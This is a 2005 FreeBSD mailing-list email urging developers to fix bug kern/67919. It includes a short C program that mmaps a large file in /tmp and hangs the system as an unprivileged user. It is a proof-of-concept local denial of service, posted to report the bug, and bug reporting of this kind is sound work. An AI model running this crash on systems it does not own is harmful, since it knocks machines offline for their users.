From owner-freebsd-current@FreeBSD.ORG Mon Oct 31 10:59:58 2005 Return-Path: X-Original-To: freebsd-current@freebsd.org Delivered-To: freebsd-current@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 623F216A425 for ; Mon, 31 Oct 2005 10:59:58 +0000 (GMT) (envelope-from caiquanqing@gmail.com) Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.194]) by mx1.FreeBSD.org (Postfix) with ESMTP id BC42843D49 for ; Mon, 31 Oct 2005 10:59:57 +0000 (GMT) (envelope-from caiquanqing@gmail.com) Received: by xproxy.gmail.com with SMTP id i28so18043wxd for ; Mon, 31 Oct 2005 02:59:56 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:cc:mime-version:content-type; b=mldXNAg17BwJKBujDNyhbc+ETvOuz9DLlECkgq1VfgvtOlkbHaaDNdwJWrOjGqcDO4UX9kb8TChMdu9E8ji62UIIkpw3q42e/yEnE3V6M2mReTzNrGITVIUkG5EUb7eSEafIDk2egUv1UerMEzAgWyV1HHi2I7qED1ZwuEUr4TM= Received: by 10.70.131.6 with SMTP id e6mr1521276wxd; Sun, 30 Oct 2005 21:28:22 -0800 (PST) Received: by 10.70.11.18 with HTTP; Sun, 30 Oct 2005 21:28:22 -0800 (PST) Message-ID: <2b22951e0510302128q571a3c1se111262e88ae19bb@mail.gmail.com> Date: Sun, 30 Oct 2005 21:28:22 -0800 From: "Cai, Quanqing" To: freebsd-current@freebsd.org, bug-followup@FreeBSD.org MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline X-Content-Filtered-By: Mailman/MimeDel 2.1.5 Cc: Edwin Groothuis , Igor Sysoev , Uwe Doering Subject: Re: kern/67919: Why nobody take serious to fix this bug? X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 31 Oct 2005 10:59:58 -0000 Today I happened to read this message on freebsd-stable: http://lists.freebsd.org/pipermail/freebsd-stable/2005-October/019086.html After I read all messages and related links, I feel so frustrating, why nobody take serious to fix this bug even we have a patch for it? I can repeat this bug on 7.0-CURRENT and 6.0-RC1 easily as a normal user! System goes no response so I have to power cycle it. The patch made by Uwe Doering actually works well. This bug looks like a security hole to me:( If you guy= s don't like this patch, please give out a reason and come out a better patch or solution. For impatience, you can run this to crush your system(7.x, 6.x, 5.x), you have to increase FILELEN to a size greater than your /tmp partition: =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D #include #include #include #include #include #include #define FILENAME "/tmp/test" /* where to put the test file */ #define FILELEN 710 /* test file length in MB */ main() { int fd; size_t len; char *buf, *p, *lim; len =3D FILELEN * 1024 * 1024; if ((fd =3D open(FILENAME, O_RDWR|O_CREAT|O_TRUNC, 0666)) =3D=3D -1) err(2, "open() failed"); if (ftruncate(fd, len) =3D=3D -1) err(2, "ftruncate() failed"); buf =3D mmap(NULL, len, PROT_WRITE, MAP_SHARED, fd, 0); if (buf =3D=3D MAP_FAILED) err(2, "mmap() failed"); (void)close(fd); for (p =3D buf, lim =3D p + len; p < lim; p +=3D 4096) *p =3D '0'; if (munmap(buf, len) =3D=3D -1) err(2, "munmap() failed"); exit(0); } =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D Cai, Quanqing